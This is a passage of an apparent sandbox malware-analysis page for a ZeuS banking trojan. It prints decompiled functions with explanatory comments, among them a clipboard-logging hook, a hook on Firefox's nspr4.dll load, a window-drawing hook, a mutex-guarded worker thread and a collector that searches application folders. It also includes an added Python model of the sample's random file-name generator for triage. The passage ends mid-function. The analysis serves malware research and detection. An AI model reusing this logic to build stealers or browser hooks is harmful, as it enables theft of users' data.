						E00417A56( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
						_v36 =  *_t61;
						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
						if(GetTopWindow(_v40) != 0) {
							E004098F3( &_v28, _t35);
						}
						goto L12;
					}
					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
						goto L12;
					}
					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
					L9:
					if(_t30 == 0) {
						goto L12;
					}
					goto L10;
				}
			}

APIs
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Rect$IntersectWindow$EmptyInfo
  • String ID:
  • API String ID: 1664082778-0
  • Opcode ID: 59e13ce2af431b91e38bf855e7a2de9b026d555c6a289651b2b2d702a0a7e40c
  • Instruction ID: 6a82ab9d6d0487970fa7768a63ddd320dd102ad984f593d2e39cceeb4cf4f801
  • Opcode Fuzzy Hash: 59e13ce2af431b91e38bf855e7a2de9b026d555c6a289651b2b2d702a0a7e40c
  • Instruction Fuzzy Hash: C121A1711083019BD720DF68ED80E97B3FCAF44754B044A2AF885D3352EB39E9458BB5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E0041BDC2(void* __ecx, void* __esi, void* __eflags) {
				// Worker thread: takes a named mutex, then re-runs E00409465 every 200 ms until
				// the global stop event at 0x423e74 is signalled. If the mutex is not obtained the
				// thread returns immediately (the report's "may stop execution after checking mutex").
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				intOrPtr _t18;
				void* _t26;
				void* _t40;
				WCHAR* _t43;

				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);                       // THREAD_PRIORITY_NORMAL
				_t18 = E0041C97E(_t40, 0x19367402, 1);                          // mutex derived from tag 0x19367402 (CreateMutexW in the subcall)
				_v12 = _t18;
				if(_t18 != 0) {
					E0041C946(0xff220829,  &_v204, 0);                           // second derived name (tag 0xff220829) into _v204
					_t43 =  &_v724;
					E0041CC9C(_t40, _t43, __esi, 1);                             // build a path into _v724 ...
					PathQuoteSpacesW(_t43);                                      // ... and quote it if it contains spaces
					_t41 = _t43;
					_v8 = E00405D35(_t43);                                       // its length in characters
					if(E0041CAA4() == 0) {                                       // bot not in the running state: release and leave
						L7:
						E004089B9(_v12);                                         // release/close the mutex
						return 0;
					}
					_push(__esi);
					_t26 = 3;
					E0040F34A(_t26,  &_v104);                                    // decode entry #3 of the string table into _v104
					if(WaitForSingleObject( *0x423e74, 0xc8) != 0x102) {         // anything but WAIT_TIMEOUT: stop event already set
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;                                         // byte size of the wide string incl. terminator
					do {
						E00409465(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
					} while (WaitForSingleObject( *0x423e74, 0xc8) == 0x102);    // repeat every 200 ms until signalled
					goto L6;
				}
				return _t18 + 1;                                                 // mutex not obtained: return 1 without doing anything
			}

APIs
  • GetCurrentThread.KERNEL32 ref: 0041BDCD
  • SetThreadPriority.KERNEL32(00000000), ref: 0041BDD4
    • Part of subcall function 0041C97E: CreateMutexW.KERNEL32(004239E8,00000000,?,?,?,?,?), ref: 0041C99F
  • PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 0041BE17
  • WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 0041BE4F
  • WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 0041BE85
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
  • String ID:
  • API String ID: 123286213-0
  • Opcode ID: 2347e79e45b425e8c25c72bce26361ef6fc96e2928527663b062d178beaf456e
  • Instruction ID: 141df8375462e81b798ba4ccc292f5c90ab283ad61c8b985a3fdf18497251b34
  • Opcode Fuzzy Hash: 2347e79e45b425e8c25c72bce26361ef6fc96e2928527663b062d178beaf456e
  • Instruction Fuzzy Hash: 8F219F71A40208AEDF11EBA09D85FEE7779EB04344F10446AF604F71A1DA789E858B98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%
			E00404EB7(void* __edx, void* _a4) {
				// GetClipboardData hook: _a4 is the clipboard format. Text formats are copied into
				// the bot's log under the 0x4223b8 critical section, and the original handle is
				// returned so the calling application sees unchanged behaviour.
				void* __ebx;
				signed int _t11;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				int _t25;

				_t22 = __edx;
				_t25 = _a4;
				_t23 = GetClipboardData(_t25);
				_a4 = _t23;
				if(E0041CAA4() == 0) {                                           // bot not active: plain pass-through
					return _t23;
				}
				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {         // only CF_TEXT (1), CF_UNICODETEXT (0xd), CF_OEMTEXT (7)
					L20:
					return _a4;
				} else {
					_t20 = GlobalLock(_t23);
					if(_t20 == 0) {
						L19:
						goto L20;
					}
					_t11 = _t25 - 1;
					if(_t11 == 0) {                                              // CF_TEXT: convert with code page 0 (CP_ACP)
						_push(_t20);
						_push(0);
						L12:
						_t24 = E00405426(_t11 | 0xffffffff);                     // E00405426(-1, codepage, src): -1 = NUL-terminated input; consistent with a MultiByteToWideChar wrapper
						L15:
						if(_t24 != 0) {
							EnterCriticalSection(0x4223b8);
							E00404BB4(E00404BB4(_t13, _t20, _t22, 0x4015f4), _t20, _t22, _t24);   // write tag 0x4015f4, then the text, to the log (_t13 is a decompiler artifact)
							LeaveCriticalSection(0x4223b8);
							if(_t24 != _t20) {
								E004051E6(_t24);                                 // free the converted copy (HeapFree in the subcall)
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t11 = _t11 - 6;
					if(_t11 == 0) {                                              // CF_OEMTEXT: convert with code page 1 (CP_OEMCP)
						_push(_t20);
						_push(1);
						goto L12;
					}
					_t13 = _t11 != 6;
					if(_t11 != 6) {                                              // unreachable after the format check above
						_t24 = _a4;
					} else {
						_t24 = _t20;                                             // CF_UNICODETEXT (0xd - 1 - 6 == 6): use the locked buffer as-is
					}
					goto L15;
				}
			}

APIs
  • GetClipboardData.USER32 ref: 00404EC0
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • GlobalLock.KERNEL32 ref: 00404EF4
  • EnterCriticalSection.KERNEL32(004223B8,00000000,00000000), ref: 00404F34
  • LeaveCriticalSection.KERNEL32(004223B8,00000000,004015F4), ref: 00404F4B
  • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00404F5E
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
  • String ID:
  • API String ID: 1109978993-0
  • Opcode ID: 6d8c9342c154edf4a2fd15d172b468659fcad3ba5e91eec83aeb719533e99738
  • Instruction ID: 5aee17a5ccf7a13ed7efcf30dec4f73545527de33865d474c75aaba31fd241c8
  • Opcode Fuzzy Hash: 6d8c9342c154edf4a2fd15d172b468659fcad3ba5e91eec83aeb719533e99738
  • Instruction Fuzzy Hash: F21127B250011667CA112A289984ABF3658ABC5355B19003BFB05B72E0DB3C8D4182AE
Uniqueness

Uniqueness Score: -1.00%

APIs
  • socket.WS2_32(?,00000002,00000000), ref: 0040871D
  • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 00408747
  • WSAGetLastError.WS2_32 ref: 0040874E
  • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040877A
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
  • closesocket.WS2_32(?), ref: 0040878E
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
  • String ID:
  • API String ID: 2355469559-0
  • Opcode ID: d79d88f7844b1e9802affada3e9bf7374699f14c24e6e843179cd4f7483394ad
  • Instruction ID: 3bfece7da5557f3e5294368fa7f95caf1df6d455ea19f5e8efc24b266aa6de1b
  • Opcode Fuzzy Hash: d79d88f7844b1e9802affada3e9bf7374699f14c24e6e843179cd4f7483394ad
  • Instruction Fuzzy Hash: C3115171801118BBDB10AFA5DD49CDF7E7CEF453A0B204125F906F61A4D6349E41DAE4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 64%
			E00418B65(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				// DLL-load hook. The function pointers at 0x4239e4 / 0x4239e0 are called with the
				// (PathToFile, Flags, ModuleFileName, &Handle) layout of LdrGetDllHandle / LdrLoadDll;
				// the page does not name them, so that identification is a reading of the arguments.
				// _a12 is a UNICODE_STRING (Buffer at +4). The first successful load of nspr4.dll
				// (Firefox's NSPR runtime) triggers E0040E2A9 once, guarded by bit 0 of 0x423888.
				void* __edi;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t28;
				intOrPtr* _t29;
				intOrPtr _t31;

				if(E0041CAA4() != 0) {
					_t29 = _a16;
					_t24 = _a12;
					_t12 =  *0x4239e4(_a4, 0, _t24, _t29, _t23, _t28, _t17);     // is the module already loaded? (negative status: no)
					_t13 =  *0x4239e0(_a4, _a8, _t24, _t29);                     // forward the real load
					_a4 = _t13;
					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {   // first successful load of this module
						EnterCriticalSection(0x423870);
						if(( *0x423888 & 0x00000001) == 0) {                     // not yet handled
							_t31 =  *_t29;                                       // module base
							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {    // compare the UNICODE_STRING buffer, case-insensitive
								_t16 = 0;
							} else {
								_t16 = E0040E2A9(_t21, _t22, _t31);              // called with the nspr4.dll base (hook installation is the likely purpose)
							}
							if(_t16 != 0) {
								 *0x423888 =  *0x423888 | 0x00000001;            // remember it is done
							}
						}
						LeaveCriticalSection(0x423870);
					}
					return _a4;                                                  // status of the real call
				}
				goto ( *0x4239e0);                                               // bot inactive: tail-jump to the original function
			}

APIs
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • EnterCriticalSection.KERNEL32(00423870), ref: 00418BBC
  • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00418BD6
  • LeaveCriticalSection.KERNEL32(00423870), ref: 00418BF7
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
  • String ID: nspr4.dll$p8B
  • API String ID: 3081114022-2481706081
  • Opcode ID: b1874c3d90e7a9337c99e34f607db2f9917676b2622ce5c6ab961ceafca2dcb7
  • Instruction ID: 35e934171f5e2ec1cfc5913f656fec0e042482b958f38a7548a20fafb374fd5a
  • Opcode Fuzzy Hash: b1874c3d90e7a9337c99e34f607db2f9917676b2622ce5c6ab961ceafca2dcb7
  • Instruction Fuzzy Hash: 1D11A3B1204219ABCB215F11EC44BE77BA8EF45755F14402FFC01A7222CB79E9C2CA9C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E004177CD(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				// GetUpdateRect hook. When bit 2 of the flags at 0x4239b0 is set and the calling
				// thread's TLS context (slot *0x42323c) names this window, the hook answers with the
				// context's own rectangle instead of the real update region; otherwise it passes
				// the call through.
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x4239b0 & 0x00000004) == 0 || E0041CAA4() == 0) {
					L9:
					return GetUpdateRect(_t28, _a8, _a12);                       // pass-through
				} else {
					_t32 = TlsGetValue( *0x42323c);                              // per-thread context: hwnd at +4, HDC at +8, RECT at +0xc
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							E00405222( &_a8, _t6, 0x10);                         // copy the 16-byte RECT to the caller's lpRect (the decompiler shows the argument slot rather than *_a8)
						}
						if(_a12 != 0) {                                          // bErase requested
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);    // WM_ERASEBKGND (0x14) with the context's DC
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;           // neg/sbb/inc idiom: stores (result == 0), i.e. background not erased
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;                                              // mark the context as having a pending update
						return 1;                                                // TRUE: the update region is non-empty
					}
				}
			}

APIs
  • GetUpdateRect.USER32 ref: 00417854
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • TlsGetValue.KERNEL32 ref: 004177ED
  • SaveDC.GDI32(?), ref: 0041781D
  • SendMessageW.USER32(?,00000014,?,00000000), ref: 0041782D
  • RestoreDC.GDI32(?,00000000), ref: 0041783F
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
  • String ID:
  • API String ID: 3142230470-0
  • Opcode ID: cd8456fc314b3bccaff62e2128320fe87c4a858a8782ac5ddfd2330f6f6320fd
  • Instruction ID: 6689aaa6ee9f87e95d0a64a7fe1afaa00f3e46dd598058abb6d248534c18f8a7
  • Opcode Fuzzy Hash: cd8456fc314b3bccaff62e2128320fe87c4a858a8782ac5ddfd2330f6f6320fd
  • Instruction Fuzzy Hash: B7119A31044344EFCB22AF60EC48FDB7BB9EF08711F00882AFA4692661C37894C0CB28
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E004179C2() {
				// Message-loop thread: consumes only thread messages (hwnd == -1 in GetMessageW) and
				// executes requests tagged with the private message ID stored at 0x423240, handing the
				// result back through the shared state at 0x423248 and the event at 0x423244.
				struct tagMSG _v32;
				signed int _t12;
				char _t17;
				void* _t21;

				SetThreadPriority(GetCurrentThread(), 1);                       // THREAD_PRIORITY_ABOVE_NORMAL
				SetEvent( *0x423244);                                            // signal "thread ready"
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);                // hwnd == -1: thread messages only
					if(_t12 == 0xffffffff) {                                     // error
						break;
					}
					if(_t12 == 0) {                                              // WM_QUIT
						break;
					}
					if(_v32.message ==  *0x423240 && _v32.wParam == 0xfffffffc) {   // request type -4, lParam carries the request data
						_t17 = E00417275( *0x423248 + 0x114, _t19, _t21, 0x423238, _v32.lParam, 1);
						_t19 =  *0x423248;
						 *((char*)( *0x423248 + 0x124)) = _t17;                  // store the result byte in the shared state
						SetEvent( *0x423244);                                    // wake the requester
					}
				}
				return _t12 & 0xffffff00 | _t12 == 0x00000000;                  // TRUE when the loop ended on WM_QUIT
			}

APIs
  • GetCurrentThread.KERNEL32 ref: 004179CF
  • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041D51E), ref: 004179D6
  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,0041D51E), ref: 004179E8
  • SetEvent.KERNEL32(00423238,?,00000001), ref: 00417A35
  • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00417A42
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: EventThread$CurrentMessagePriority
  • String ID:
  • API String ID: 3943651903-0
  • Opcode ID: 3114360d17cc64aa443792f11790df72001a4af6065ca9dddbe3c861aa70de6a
  • Instruction ID: f49ca340768a302a4ff21ae413e600596b057eb3893a4cc8981c6a1b2f61f3e4
  • Opcode Fuzzy Hash: 3114360d17cc64aa443792f11790df72001a4af6065ca9dddbe3c861aa70de6a
  • Instruction Fuzzy Hash: 8801F931204200E7CA209F69ED45F9A7B74DB45770F10036AF660961F0C7399541C7AD
Uniqueness

Uniqueness Score: -1.00%

APIs
  • WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040EC9B,00000000), ref: 0040E868
  • ReleaseMutex.KERNEL32(?), ref: 0040E89C
  • IsWindow.USER32(?), ref: 0040E8A3
  • PostMessageW.USER32(?,00000215,00000000,?), ref: 0040E8BD
  • SendMessageW.USER32(?,00000215,00000000,?), ref: 0040E8C5
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
  • String ID:
  • API String ID: 794275546-0
  • Opcode ID: c95192b305a22dde4d3a31201a034f79c5eef2f8e5fd0a9afac7192a4567969f
  • Instruction ID: b7e012eebce3405f3ba879d7db877b1c4a3faecc54a9f1a724097f110de9bd89
  • Opcode Fuzzy Hash: c95192b305a22dde4d3a31201a034f79c5eef2f8e5fd0a9afac7192a4567969f
  • Instruction Fuzzy Hash: C8F06934204700DFC3209F25D848D66BBB4FB89711B048A7DF896A37B0C770A844CB25
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00409565(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				// Pronounceable random-name generator. __eax/__ecx bound the length, _a4 carries flags
				// (bit 1: upper-case the first character, bit 2: sprinkle spaces) and _a8 receives the
				// UTF-16 result. Characters come in pairs, one from each table; which table leads is
				// re-drawn every two characters.
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t71;
				char* _t77;
				signed int _t84;
				signed short* _t85;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = E0040656B(__eax & 0x000000ff, __ecx & 0x000000ff);       // random length in [min, max]
				_v16 = _t87;
				_t56 = E0040651F();                                              // PRNG (GetTickCount-seeded in the subcall)
				_t77 = "bcdfghklmnpqrstvwxz";                                    // 19 consonants
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";                                             // 6 vowels lead the first pair
					_v28 = _t77;
				} else {
					_v32 = _t77;                                                 // consonants lead
					_v28 = "aeiouy";
				}
				_t84 = 0;                                                        // output position
				_v12 = 0;                                                        // position of the last space
				_v8 = 0;                                                         // index within the current pair
				if(_t87 > 0) {
					_v20 = _a4 & 0x00000004;                                     // spaces allowed?
					do {
						if(_v8 == 2) {                                           // pair complete: re-draw the table order
							if((E0040651F() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t77;
							} else {
								_v32 = _t77;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));           // table for this position
						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;   // table size: 19 for consonants, 6 for vowels
						if(_v20 == 0 || _t84 - _v12 <= 1 || (E0040651F() & 0x00000101) != 0x101) {   // no space unless allowed, at least one char since the last one, and a 1-in-4 draw
							_t71 =  *((char*)(E0040656B(_v24 - 1, 0) + _t88));   // random index into the table
						} else {
							_t71 = 0x20;                                         // emit a space
							_v12 = _t84;
						}
						_a8[_t84] = _t71;
						_t84 = _t84 + 1;
						_v8 = _v8 + 1;
					} while (_t84 < _v16);
					_t87 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
					_t85 = _a8;
				} else {
					_t85 = _a8;
					_t59 = _t85 + _t87 * 2 - 2;                                  // strip trailing spaces
					while( *_t59 == 0x20) {
						_t59 = _t59 - 2;
						_t87 = _t87 - 1;
						if(_t87 != 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t85[_t87] = 0;                                                  // NUL-terminate
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t85 & 0x0000ffff);                      // upper-case the first character
					 *_t85 = 0;                                                  // decompiler dropped the value: the binary stores the CharUpperW result here
				}
				return _t57;
			}

APIs
    • Part of subcall function 0040651F: GetTickCount.KERNEL32 ref: 0040651F
  • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00409686
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CharCountTickUpper
  • String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
  • API String ID: 2674899715-3410450461
  • Opcode ID: a53e8278b3b58a00e491ca46b6a46092f013c341d66e09cbab7f214665e92490
  • Instruction ID: 63dbc39059de59c65e329b6ba897f894b0a12b739c0e5dbad260fcc0baf44038
  • Opcode Fuzzy Hash: a53e8278b3b58a00e491ca46b6a46092f013c341d66e09cbab7f214665e92490
  • Instruction Fuzzy Hash: 19318F71D00609ABCB119FA5C4856AEBBB4EF44304F15847BD812BB2C2D77DDE41CB99
Uniqueness

Uniqueness Score: -1.00%
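The routine at 0x00409565 is compact enough to model exactly, and a reference model is useful when triaging dropped file names: the output is pairs of lowercase characters drawn from two fixed tables, one consonant and one vowel per pair, optionally with a capitalised first letter and interior spaces. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox. `random.Random` stands in for the bot's GetTickCount-seeded PRNG (E0040651F / E0040656B), and `matches_pattern` is an added triage helper that tests whether a string has the alternating shape the generator emits.

```python
import random

# Character tables exactly as they appear in the sample (0x00409565).
CONSONANTS = "bcdfghklmnpqrstvwxz"   # 19 entries
VOWELS = "aeiouy"                    # 6 entries

FLAG_CAPITALIZE = 0x2   # _a4 & 2: upper-case the first character (CharUpperW)
FLAG_SPACES = 0x4       # _a4 & 4: occasionally replace a character with a space


def generate_name(min_len, max_len, flags=0, rng=None):
    """Model of the name generator at 0x00409565.

    The sample draws its randomness from a GetTickCount-seeded PRNG
    (E0040651F / E0040656B); a random.Random instance stands in for it here.
    """
    rng = rng if rng is not None else random.Random()
    length = rng.randint(min_len, max_len)          # E0040656B(min, max)
    out = []
    last_space = 0                                  # _v12: position of the last space
    tables = (VOWELS, CONSONANTS)
    for pos in range(length):
        slot = pos % 2                              # _v8: index within the current pair
        if slot == 0:
            # Every two characters the sample re-draws which table leads
            # ((E0040651F() & 0x100) != 0 means consonant first).
            if rng.getrandbits(16) & 0x100:
                tables = (CONSONANTS, VOWELS)
            else:
                tables = (VOWELS, CONSONANTS)
        table = tables[slot]
        # A space is allowed only with FLAG_SPACES, never directly after the
        # previous one, and only when both random bits of 0x101 are set.
        if (flags & FLAG_SPACES and pos - last_space > 1
                and (rng.getrandbits(16) & 0x101) == 0x101):
            out.append(" ")
            last_space = pos
        else:
            out.append(table[rng.randint(0, len(table) - 1)])   # E0040656B(len - 1, 0)
    name = "".join(out)
    if flags & FLAG_SPACES:
        name = name.rstrip(" ")                     # the trailing-space trim loop
    if flags & FLAG_CAPITALIZE and name:
        name = name[0].upper() + name[1:]           # CharUpperW on the first character
    return name


def matches_pattern(name):
    """Added triage helper: True if `name` (no spaces) could have come from the
    generator, i.e. every character is from the two tables and each pair holds
    one consonant and one vowel."""
    s = name.lower()
    if not s or any(c not in CONSONANTS + VOWELS for c in s):
        return False
    for i in range(0, len(s) - 1, 2):
        if (s[i] in VOWELS) == (s[i + 1] in VOWELS):
            return False
    return True


if __name__ == "__main__":
    rng = random.Random(2021)                       # fixed seed so the run is reproducible
    for flags in (0, FLAG_CAPITALIZE, FLAG_CAPITALIZE | FLAG_SPACES):
        print(hex(flags), repr(generate_name(6, 12, flags, rng)))
```

`matches_pattern` is deliberately loose: it accepts any string with the generator's shape, so use it to rank candidates for a closer look rather than as a verdict on its own.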

C-Code - Quality: 85%
			E00413CDB(void* __ecx, char* __edx, void* __eflags) {
				// Collector for one target application (its names come from the encrypted string
				// table, entries 0x60-0x63, which the page does not decode). Step 1: read an install
				// path from HKEY_LOCAL_MACHINE. Step 2: if nothing was collected, search the common
				// AppData, user AppData and Program Files folders. Step 3: report what was found
				// (type 0xcb) or free the list.
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v76;
				char _v116;
				char _v636;
				short _v1156;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00405299( &_v12,  &_v12, 0, 8);                                 // zero the 8-byte result list {_v12 = buffer, _v8 = count}
				_t28 = 0x60;
				E0040F34A(_t28,  &_v116);                                        // string #0x60: registry subkey
				_t30 = 0x61;
				E0040F34A(_t30,  &_v52);                                         // string #0x61: value name
				_t55 =  &_v636;
				_t35 = E0040930A(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);   // read the value from HKEY_LOCAL_MACHINE (RegOpenKeyExW in the subcall)
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
						E00413A93(_t65,  &_v1156,  &_v12);                        // collect from the file at that path into the list
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {                                              // _t70 is _v8 (the decompiler lost the assignment on this path)
						return E004051E6(_v12);                                  // nothing found: free the buffer
					}
					_push(0xcb);
					return E0041293E(_t54, _v12, 0x63);                          // report the collected data (tag 0x63, type 0xcb)
				} else {
					_t60 =  &_v76;
					_t39 = 0x62;
					E0040F34A(_t39, _t60);                                       // string #0x62: file name pattern
					_v28 = 0x23;                                                 // CSIDL_COMMON_APPDATA
					_v24 = 0x1a;                                                 // CSIDL_APPDATA
					_v20 = 0x26;                                                 // CSIDL_PROGRAM_FILES
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v636;
